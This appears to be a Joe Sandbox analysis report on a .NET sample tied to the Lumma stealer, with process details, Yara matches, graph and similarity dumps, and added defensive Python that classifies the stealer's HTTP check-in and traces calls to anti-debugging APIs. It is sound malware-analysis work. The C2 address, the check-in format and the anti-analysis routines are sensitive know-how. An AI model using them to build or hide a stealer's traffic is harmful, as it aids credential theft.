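        out += body[pos:pos + size]
        pos += size + 2                                  # skip data and its CRLF


def classify_checkin(request: bytes, response: bytes) -> dict:
    """Extract the features of the exchange and decide if it matches the check-in."""
    req_line, req_hdr, req_body = parse_http(request)
    _, resp_hdr, resp_body = parse_http(response)
    method, path, _ = req_line.split(" ", 2)
    form = parse_qs(req_body.decode("latin-1"))
    if resp_hdr.get("transfer-encoding", "").lower() == "chunked":
        resp_body = dechunk(resp_body)
    features = {
        "host": req_hdr.get("host"),
        "method": method,
        "path": path,
        "act": form.get("act", [None])[0],
        "length_ok": int(req_hdr.get("content-length", "-1")) == len(req_body),
        "reply": resp_body.decode("latin-1"),
    }
    # Heuristic (assumption): a form-encoded POST /api carrying act=life that the
    # server acknowledges with a bare "ok" is treated as the Lumma heartbeat.
    features["lumma_checkin"] = (
        method == "POST" and path == "/api"
        and req_hdr.get("content-type", "").startswith("application/x-www-form-urlencoded")
        and features["act"] == "life" and features["reply"] == "ok"
    )
    return features
```

This only works on the decrypted layer the sandbox exposes; on the wire the exchange ran inside TLS to 104.21.62.151:443, and the ET JA3 alert on the same connection matched the ClientHello fingerprint, which a parser of the HTTP payload never sees. The Chrome/119 User-Agent string says nothing about the TLS stack that actually spoke to the server, so the two signals complement rather than duplicate each other.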



                                                        Target ID:0
                                                        Start time:02:13:02
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\Desktop\3vLKNycnrz.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\3vLKNycnrz.exe"
                                                        Imagebase:0xd60000
                                                        File size:3'635'712 bytes
                                                        MD5 hash:78B4D3E1DF367155161B0CA24D08B157
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
Programmed in:C, C++ or other language (sandbox heuristic; the CLR header in the COM_DESCRIPTOR data directory and the sole import mscoree.dll!_CorExeMain identify the file as a .NET executable)
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1430982949.0000000006240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:02:13:03
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\Desktop\3vLKNycnrz.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\3vLKNycnrz.exe"
                                                        Imagebase:0xb10000
                                                        File size:3'635'712 bytes
                                                        MD5 hash:78B4D3E1DF367155161B0CA24D08B157
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
Programmed in:C, C++ or other language (sandbox heuristic; same file as Target 0, a .NET executable per its CLR header and mscoree.dll!_CorExeMain import)
                                                        Reputation:low
                                                        Has exited:true


Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 22.9%
Total number of Nodes: 48
Total number of Limit Nodes: 2

execution_graph (serialized node list omitted; all addresses lie in the 0x03290000 dynamic-code dump and are reached from the root 0x32909e0 through 0x32909fb):
• 0x32909fb -> 0x3292c38 -> 0x3292c78 / 0x3292c88 -> 0x3292c9e -> 0x3291310 / 0x3291320 / 0x3291378 -> CheckRemoteDebuggerPresent (call sites 0x32913c0 and 0x32913db)
• 0x32909fb -> 0x3292d48 -> 0x3292d7b -> 0x3292e98 / 0x3292ea8 -> 0x3292ece -> 0x3292b29 / 0x3292b30 -> 0x3292b7b -> NtQueryInformationProcess
• 0x32909fb -> 0x3292df7 -> 0x3292dfc -> the same 0x3292e98 / 0x3292ea8 pair, shown collapsed and annotated "2 API calls"
Each branch returns to 0x32909fb (via 0x3292c62, 0x3292df0 and 0x3292e05). The paired entry points a few bytes apart (0x3291310 / 0x3291320, 0x3292b29 / 0x3292b30) are alternative entries into the same bodies, which is why both reach the same call sites.
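Joe Sandbox serializes the execution graph above as a flat token stream: a decimal node id followed by a hex address starts a node, an API name after it annotates that node, and from->to pairs are edges. As an added example (my code, not part of the report or its tooling), the block below parses an excerpt of that stream and uses a breadth-first search to return the shortest path from the root 0x32909e0 to every node annotated with an API name, which is the question an analyst asks of such a graph: how does execution get from the entry of the decrypted code to CheckRemoteDebuggerPresent and NtQueryInformationProcess. The parsing rules are inferred from the report's text (the "2 API calls" annotation on collapsed nodes is deliberately not mistaken for a node definition); GRAPH_TEXT is a subset of the report's graph, not a different sample.

```python
"""Walk the report's execution_graph text and list call chains reaching Win32/NT APIs.

Added example; not Joe Sandbox tooling. GRAPH_TEXT is an excerpt of the
report's serialized graph (node id, hex address, optional API annotation,
and "from->to" edges); the parsing rules are inferred from that text.
"""
import re
from collections import deque

GRAPH_TEXT = (
    "execution_graph 26603 32909e0 26604 32909fb 26603->26604 "
    "26608 3292c38 26604->26608 26612 3292d48 26604->26612 26617 3292df7 26604->26617 "
    "26622 3292c78 26608->26622 26613 3292d7b 26612->26613 26648 3292ea8 26613->26648 "
    "26618 3292dfc 26617->26618 26620 3292ea8 2 API calls 26618->26620 "
    "26623 3292c9e 26622->26623 26643 3291320 26623->26643 26645 3291331 26643->26645 "
    "26646 32913db CheckRemoteDebuggerPresent 26645->26646 "
    "26649 3292ece 26648->26649 26658 3292b29 26649->26658 "
    "26659 3292b7b NtQueryInformationProcess 26658->26659"
)

ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{6,}$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(r"^(?:[A-Z][a-z]+){2,}$")   # CamelCase export names only; skips "API", "calls"


def parse_graph(text: str):
    """Return (node -> address, node -> set of API names, node -> successor list)."""
    tokens = text.split()
    addr, apis, edges, current, i = {}, {}, {}, None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.setdefault(edge.group(1), []).append(edge.group(2))
        elif ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                       # "<id> <addr>" starts a node definition
            addr[current] = int(tokens[i + 1], 16)
            i += 1
        elif current is not None and API_RE.match(tok):
            apis.setdefault(current, set()).add(tok)   # annotation on the current node
        i += 1
    return addr, apis, edges


def api_paths(text: str, root: int) -> dict:
    """Shortest path (as hex addresses) from root to every node annotated with an API."""
    addr, apis, edges = parse_graph(text)
    start = next(node for node, a in addr.items() if a == root)
    parent, queue = {start: None}, deque([start])
    while queue:                                # BFS gives the shortest chain per node
        node = queue.popleft()
        for nxt in edges.get(node, []):
            if nxt not in parent:
                parent[nxt] = node
                queue.append(nxt)
    result = {}
    for node, names in apis.items():
        if node not in parent:
            continue                            # API node not reachable from root
        chain, cur = [], node
        while cur is not None:
            chain.append(f"{addr.get(cur, 0):x}")
            cur = parent[cur]
        for name in sorted(names):
            result.setdefault(name, []).append(chain[::-1])
    return result
```

Feed the full graph string from a report to `api_paths` and the output is the list of chains worth setting breakpoints on when the sample is rerun under a debugger with the checks patched out. Nodes that the report collapses ("2 API calls") carry no API name of their own, so they never appear as path endpoints; expand them in the report if the collapsed subtree matters.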

Control-flow Graph

control_flow_graph (serialized block list omitted): function at 0x609a678 in the 0x06090000 dump, basic blocks spanning 0x609a678-0x609bfd9; the only calls are from block 0x609a7ed to 0x609d208 and 0x609d1f8; no API call sites; block 0x609bfd9 branches back to itself.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2
                                                          • API String ID: 0-450215437
                                                          • Opcode ID: 65a82027daf4801640a1d885538c50d7f2c8df6a27062d0c07732b859e7c08f9
                                                          • Instruction ID: 1efd07c3f49b3bb234c80a25b0f2cf9078b6aaaec64b57d382fa29c701ca1a4c
                                                          • Opcode Fuzzy Hash: 65a82027daf4801640a1d885538c50d7f2c8df6a27062d0c07732b859e7c08f9
                                                          • Instruction Fuzzy Hash: 53E2B074A01629CFDB64DF68D884B9EBBB6FB88311F1081EAD509A7354DB349E81CF50

Control-flow Graph

control_flow_graph (serialized block list omitted): function at 0x6099430 in the 0x06090000 dump, basic blocks spanning 0x6099430-0x609a30b; calls 0x6095ba8 from three blocks (0x6099545, 0x6099c88, 0x6099f03); no API call sites.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: {-!Q
                                                          • API String ID: 0-1025268147
                                                          • Opcode ID: 5d72bf474a6477be718cb04e2d52a55a493c89dee3541b3fc2d4eb9a16b7ccac
                                                          • Instruction ID: 28f05403953cbf3d73b78acbf817ac165b78d82e83bc2dbe1b60a3d642801733
                                                          • Opcode Fuzzy Hash: 5d72bf474a6477be718cb04e2d52a55a493c89dee3541b3fc2d4eb9a16b7ccac
                                                          • Instruction Fuzzy Hash: 84A29375A00628CFDB65CF69C984AD9BBB2FF89300F1581D9E509AB321DB319E81DF50

Control-flow Graph

control_flow_graph (serialized block list omitted): function at 0x3291320 in the 0x03290000 dump, basic blocks 0x3291320-0x3291450; block 0x3291359 calls 0x3290170, block 0x3291365-0x3291404 calls CheckRemoteDebuggerPresent.
                                                          APIs
                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 032913F7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: CheckDebuggerPresentRemote
                                                          • String ID:
                                                          • API String ID: 3662101638-0
                                                          • Opcode ID: 09213191c689f5a2bc70a3147c01d069cc96d50e0340eeb30f831ccda65e5196
                                                          • Instruction ID: dd17960e575a53eeb93273c9de13ba3a6ef24f7218cfb318b897d4e15df7f09f
                                                          • Opcode Fuzzy Hash: 09213191c689f5a2bc70a3147c01d069cc96d50e0340eeb30f831ccda65e5196
                                                          • Instruction Fuzzy Hash: B931E13190034ACFDB14DF6AC4407AEBBF8EF48310F24846ED459AB640CB39A986CB94

Control-flow Graph

control_flow_graph (serialized block list omitted): function at 0x3292b29 in the 0x03290000 dump, basic blocks 0x3292b29-0x3292beb; the first block calls NtQueryInformationProcess.
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 03292BB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 019b50b194cb9440b1949a27c96550395992abd6870d161a20a9f91ad7735b0b
                                                          • Instruction ID: f1b2fcfa83621f2461fd815ec625979e3e70464b26f3d9fd37e19cfdb0c1b78d
                                                          • Opcode Fuzzy Hash: 019b50b194cb9440b1949a27c96550395992abd6870d161a20a9f91ad7735b0b
                                                          • Instruction Fuzzy Hash: 6A21E2B19013499FDF10DFAAD884ADEFBF5FF88310F14882AE919A7250C7759954CBA0

                                                          Control-flow Graph (rendered graph image omitted; basic blocks and edges as extracted)
                                                          • control_flow_graph 482 3292b30-3292bbd NtQueryInformationProcess 485 3292bbf-3292bc5 482->485 486 3292bc6-3292beb 482->486 485->486
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 03292BB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 20364565e077aae221805161e8038debf50ffc69601492ffcf287c065815c617
                                                          • Instruction ID: ccceab54f254e6207d4182c23844be40018b2dc57b4028bf35981cb88c7e4729
                                                          • Opcode Fuzzy Hash: 20364565e077aae221805161e8038debf50ffc69601492ffcf287c065815c617
                                                          • Instruction Fuzzy Hash: A521E2B19003499FDB10DFAAD884A9EFBF5FF88310F10882AE919A7250C7759950CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bc85ab3c188dece98465aa29c0abc85198e06ff74050045030f653829389bd8
                                                          • Instruction ID: 5dd027cc054215193dd41441e279a765f7dc313d157a0cfd9680a58a34881db0
                                                          • Opcode Fuzzy Hash: 4bc85ab3c188dece98465aa29c0abc85198e06ff74050045030f653829389bd8
                                                          • Instruction Fuzzy Hash: 8E6219B0921205CFFB20DF4AE988A99BBF1FB50309F49C19AD4155F262C3B9E895CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3150793bd52341c97b623b5f2d9d72de88916000fd8a317776f09e91006f455c
                                                          • Instruction ID: b2a9b3c8a5e6c84b850f9c1ce14c67a4d7404d3f585ba2413bdabdac7fda8b27
                                                          • Opcode Fuzzy Hash: 3150793bd52341c97b623b5f2d9d72de88916000fd8a317776f09e91006f455c
                                                          • Instruction Fuzzy Hash: 64529474A006298FDBA4DF28CD84B9ABBB2FB88311F5081D9D50DA7355DB30AE81CF55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43c52243a7d60910f874b3c3d37b091c2dad8d0adb4e0bc5b6d147ed55afdeb6
                                                          • Instruction ID: 7df1d88a96bb72b1c1f8bd9db8682a8e69656804f69bd457af1589206d61b428
                                                          • Opcode Fuzzy Hash: 43c52243a7d60910f874b3c3d37b091c2dad8d0adb4e0bc5b6d147ed55afdeb6
                                                          • Instruction Fuzzy Hash: 75F17C35A342058FEB15DB6CC890AAAB7F6FF89300F1585AAD406DB361DB71EC81CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3ce4700831df6f7c094510dbc1288cc8c9be73f4684f8bf8992c68a286af9ed
                                                          • Instruction ID: 156563fe25d9e38b58f44bafe48a66698af71c1b6f98a2619ef8ea257404c626
                                                          • Opcode Fuzzy Hash: f3ce4700831df6f7c094510dbc1288cc8c9be73f4684f8bf8992c68a286af9ed
                                                          • Instruction Fuzzy Hash: 93519871E01A188BEB58CF6BDD4469AFAF3BFC8305F14C1AAD408AA254EB745981CF50

                                                          Control-flow Graph (rendered graph image omitted; basic blocks and edges as extracted)
                                                          • control_flow_graph 466 3291378-3291404 CheckRemoteDebuggerPresent 469 329140d-3291450 466->469 470 3291406-329140c 466->470 470->469
                                                          APIs
                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 032913F7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1410716253.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3290000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: CheckDebuggerPresentRemote
                                                          • String ID:
                                                          • API String ID: 3662101638-0
                                                          • Opcode ID: 656b64bb48a6c3597d15bd9bfa8b3eaf3695e1367a88a39143e87107ce3b243a
                                                          • Instruction ID: 8d538a18430d5d2dad7ffc393e39a448b4a74abd83b282ad994b0a3c00feac70
                                                          • Opcode Fuzzy Hash: 656b64bb48a6c3597d15bd9bfa8b3eaf3695e1367a88a39143e87107ce3b243a
                                                          • Instruction Fuzzy Hash: 90215C7190034A8FDB14DFAAD4457EEBBF5AF88320F14842ED456A7290C7389A45DFA0

                                                          Control-flow Graph (rendered graph image omitted; basic blocks and edges as extracted)
                                                          • control_flow_graph 714 6095440-609549f 718 60954a1 call 3297138 714->718 719 60954a1 call 3297148 714->719 720 60954a1 call 3297187 714->720 717 60954a6-60954a8 718->717 719->717 720->717
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: g05
                                                          • API String ID: 0-992802407
                                                          • Opcode ID: 0ec0e74a97ae46bcdcd11136383a4ec7fa346dd42137bd187dfbd2e3f4b19a0d
                                                          • Instruction ID: 560f454df55c7de7caa442b1f00bb50c355864882bc83593ce154e27dba11d71
                                                          • Opcode Fuzzy Hash: 0ec0e74a97ae46bcdcd11136383a4ec7fa346dd42137bd187dfbd2e3f4b19a0d
                                                          • Instruction Fuzzy Hash: 8A01442014A3D16FE30B4A385C11AB37F75EFC775075981EBE486CB1A3D9580D4B97A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de03c853ebe5969d42fc21dd97eece4edefd57330208d101324c4bc8e8bc2da2
                                                          • Instruction ID: 5d55a0e44e21f0be6a93bc29751eb2da4b519d656a5df45332006fa2c999737f
                                                          • Opcode Fuzzy Hash: de03c853ebe5969d42fc21dd97eece4edefd57330208d101324c4bc8e8bc2da2
                                                          • Instruction Fuzzy Hash: B442A634E0420ACFDF15DB99D494AFEBBB6FB88301F50881ADA16A7394C7385982CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fc85e8c4827f96af0d2c7096064b1f171e5aef0a821afd6d1f20983848c256b
                                                          • Instruction ID: 206ba5c0a525847940213f2a08acd18de912cef1c015822f4b1594aab5e55c55
                                                          • Opcode Fuzzy Hash: 7fc85e8c4827f96af0d2c7096064b1f171e5aef0a821afd6d1f20983848c256b
                                                          • Instruction Fuzzy Hash: A6F1D434D05208DFCB54DFA9E898ABCBBB6FF49315F60486AE506A7350CB356985CF10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 217b0cf7c6048bcae2b921c4be89869368cc4a4e185b70f367cd5b09372630f3
                                                          • Instruction ID: 1eeb8d5eaec5a30fac93ca9f46d39166d011e35619647bc7651486e55d50102e
                                                          • Opcode Fuzzy Hash: 217b0cf7c6048bcae2b921c4be89869368cc4a4e185b70f367cd5b09372630f3
                                                          • Instruction Fuzzy Hash: 41A1E474E05209DFCB18EFA9D454ABDBBB6FF88305F54882AE91267350CB385986CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59c81e5bb723f77b78defd775fcd24fe089fff40e5f3ddccc1ca3557f41fafa5
                                                          • Instruction ID: b71eca3737d0446d2381865e4359de3a23d8fcdc21b87436982cd11bc0db5ab6
                                                          • Opcode Fuzzy Hash: 59c81e5bb723f77b78defd775fcd24fe089fff40e5f3ddccc1ca3557f41fafa5
                                                          • Instruction Fuzzy Hash: C3610474E05209DFDB44DFA8D888AAEBBB2FF99310F50802AD505AB394DB349D45CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 443573ba44d1f4d4a635971b061c4689779662e45fc6aa6273cc9c145392776d
                                                          • Instruction ID: 60631818224fe7f0988abe3cc3b60ead569a1efb4682c47b203efa6efc309cbd
                                                          • Opcode Fuzzy Hash: 443573ba44d1f4d4a635971b061c4689779662e45fc6aa6273cc9c145392776d
                                                          • Instruction Fuzzy Hash: A6610374E40209DFDB44DFA8D8886AEBBB2FB98310F50802AD509AB394DB349D45CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0ec40a2739f1de40bc21396673042304b76da82245700cab56d3f56a24583ab
                                                          • Instruction ID: 7b261139446556a615a125258a004be32dba50cb694a262b6a2cf6cb645a95bb
                                                          • Opcode Fuzzy Hash: d0ec40a2739f1de40bc21396673042304b76da82245700cab56d3f56a24583ab
                                                          • Instruction Fuzzy Hash: 34411C74A24105CFEB14DBB8E85D2BDBBB7BB88751F14452AE907E3382DF3488818B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 546b2d01ede1f2160208f108db8a6aa588ef3b965316e69a01c321f131583ff4
                                                          • Instruction ID: 7beb44e35ddea50279cce2b9d9786a42dbb716bb2644e26510c1249c605e87a6
                                                          • Opcode Fuzzy Hash: 546b2d01ede1f2160208f108db8a6aa588ef3b965316e69a01c321f131583ff4
                                                          • Instruction Fuzzy Hash: 143156B4D452098FEB84DFA9C8443EEBFF6FB89310F14846AD555A7381EB344981CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a92fbebc052a5ba4ec9297062b18b7495220c82f0a9d0eaea8a6ee60ca16cf9c
                                                          • Instruction ID: 6f073caf46eacf181bfb9ed9a8a03565c11bac0c3e9364791749be70137876db
                                                          • Opcode Fuzzy Hash: a92fbebc052a5ba4ec9297062b18b7495220c82f0a9d0eaea8a6ee60ca16cf9c
                                                          • Instruction Fuzzy Hash: 9E313CB0942205DFEB86EFA9C8487AEBFF3FF48300F9480AAE41597251D7344985CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1432211074.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6c70000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ffb4eeed84a42736258354834013f708c1526998e505c4f96907bbac602935f
                                                          • Instruction ID: 4e720f5aa62444f5a1cc22a7873d49451ec031b89e29977771d6a515fbb848c7
                                                          • Opcode Fuzzy Hash: 9ffb4eeed84a42736258354834013f708c1526998e505c4f96907bbac602935f
                                                          • Instruction Fuzzy Hash: DB314670E0520A8FEB60DFA9C4886EEBBF1FB49318F14802AD509A7340D7719E84CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1429259358.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59f0000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3cba8210b0c0f34f5e72c244cd70c585c08186fbe16c7c9b56bcaf8f8e749f1
                                                          • Instruction ID: 8eb36042c85390094851ec2d58a153cda2590843e0b872315a0d208a13971c85
                                                          • Opcode Fuzzy Hash: e3cba8210b0c0f34f5e72c244cd70c585c08186fbe16c7c9b56bcaf8f8e749f1
                                                          • Instruction Fuzzy Hash: AE310834D0820ACFDF19CFA9D8147FEBBB2BB85301F10846AD115AB291C7385A85CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1da5805b4892d00a36184a26e7f02bfc83cc3b13de108da525e0077849c29908
                                                          • Instruction ID: 0f888e079159c2d4dd37c8e30c301f80192493390863cb92bcc1b3d9f6434097
                                                          • Opcode Fuzzy Hash: 1da5805b4892d00a36184a26e7f02bfc83cc3b13de108da525e0077849c29908
                                                          • Instruction Fuzzy Hash: C63136B0D42209DFEB86EFA9C8487ADBFF3EB48300F9080A99419A7351D7344A84CB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1402999344.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16ad000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0a435b7bb578ef3ae26425b531a53c9351cb0c812d9dd5d2ea74f3d9b131145
                                                          • Instruction ID: ebc6ef0cbd2bfbae4f3b3088a95fae30ed5abd8b2cd9fef7a0015851f676c00a
                                                          • Opcode Fuzzy Hash: f0a435b7bb578ef3ae26425b531a53c9351cb0c812d9dd5d2ea74f3d9b131145
                                                          • Instruction Fuzzy Hash: 6A2121B1105300EFDB01DF94D9C0B66BB62FB84320F60C569E9090BB47C336E816CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1403673668.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16bd000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4b3a19b85bb4b2eec13a1a286b0d3330c0b01fbd191d93d5359889606b51dab
                                                          • Instruction ID: 0da26e51b6b1637d3569d0ce21bf6a4066296f22c6d815fa8fc1a37452ab9b1d
                                                          • Opcode Fuzzy Hash: f4b3a19b85bb4b2eec13a1a286b0d3330c0b01fbd191d93d5359889606b51dab
                                                          • Instruction Fuzzy Hash: 10212F75204204DFDB11DF44D9C4B66BB65FB88328F208569E8090F342C336C487CBA2
